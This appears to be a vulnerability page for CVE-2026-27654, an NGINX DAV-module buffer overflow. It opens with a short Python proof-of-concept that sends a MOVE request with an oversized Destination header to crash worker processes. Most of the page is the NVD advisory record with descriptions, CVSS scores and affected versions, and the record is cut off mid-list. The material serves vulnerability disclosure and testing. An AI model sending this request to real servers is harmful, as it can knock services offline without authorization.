CVE-2026-27654

import requests # CVE-2026-27654 PoC Example # This script attempts to trigger the buffer overflow in ngx_http_dav_module # Requires target to be configured with DAV MOVE/COPY, prefix location, and alias. target_url = "http://example.com/vulnerable_path/" # Malicious headers designed to trigger overflow in MOVE/COPY processing headers = { "Destination": target_url + "A" * 5000 # Long path to trigger overflow } try: # Sending a MOVE request which may trigger the vulnerability response = requests.request("MOVE", target_url + "testfile.txt", headers=headers) print(f"Status Code: {response.status_code}") print(f"Response Headers: {response.headers}") if response.status_code == 500 or response.status_code == 400: print("Potential crash or error detected.") except Exception as e: print(f"An error occurred: {e}")

{"cve": {"id": "CVE-2026-27654", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:33.130", "lastModified": "2026-03-26T21:16:16.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NGINX Open Source and NGINX Plus have a vulnerability in the ngx_http_dav_module module that might allow an attacker to trigger a buffer overflow to the NGINX worker process; this vulnerability may result in termination of the NGINX worker process or modification of source or destination file names outside the document root. This issue affects NGINX Open Source and NGINX Plus when the configuration file uses DAV module MOVE or COPY methods, prefix location (nonregular expression location configuration), and alias directives. The integrity impact is constrained because the NGINX worker process user has low privileges and does not have access to the entire system. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}, {"lang": "es", "value": "NGINX Open Source y NGINX Plus tienen una vulnerabilidad en el módulo ngx_http_dav_module que podría permitir a un atacante desencadenar un desbordamiento de búfer en el proceso de trabajador de NGINX; esta vulnerabilidad puede resultar en la terminación del proceso de trabajador de NGINX o la modificación de nombres de archivos de origen o destino fuera del directorio raíz de documentos. Este problema afecta a NGINX Open Source y NGINX Plus cuando el archivo de configuración utiliza los métodos MOVE o COPY del módulo DAV, ubicación de prefijo (configuración de ubicación sin expresión regular) y directivas alias. El impacto en la integridad está restringido porque el usuario del proceso de trabajador de NGINX tiene privilegios bajos y no tiene acceso a todo el sistema. Nota: Las versiones de software que han alcanzado el Fin del Soporte Técnico (EoTS) no son evaluadas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p1:*:*:*:*:*:*", "matchCriteriaId": "FA913184-EAAD-409E-99C6-AB979DAA93F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p2:*:*:*:*:*:*", "matchCriteriaId": "782DF180-1101-4D6A-A1D7-8DADBAF6D9D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p3:*:*:*:*:*:*", "matchCriteriaId": "FB0B11F2-4748-492B-9906-F8C4C5EAFF12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p4:*:*:*:*:*:*", "matchCriteriaId": "86B53968-1CCA-4CF3-8454-BB92EF64D10E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:*:*:*:*:*:*:*", "matchCriteriaId": "4F58BD02-EA76-4F32-87D6-430026C8553E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p1:*:*:*:*:*:*", "matchCriteriaId": "46DC49B8-7286-4867-9CDA-1C1B469CD304"}, {"vulnerable": true, "criteria": ... (truncated)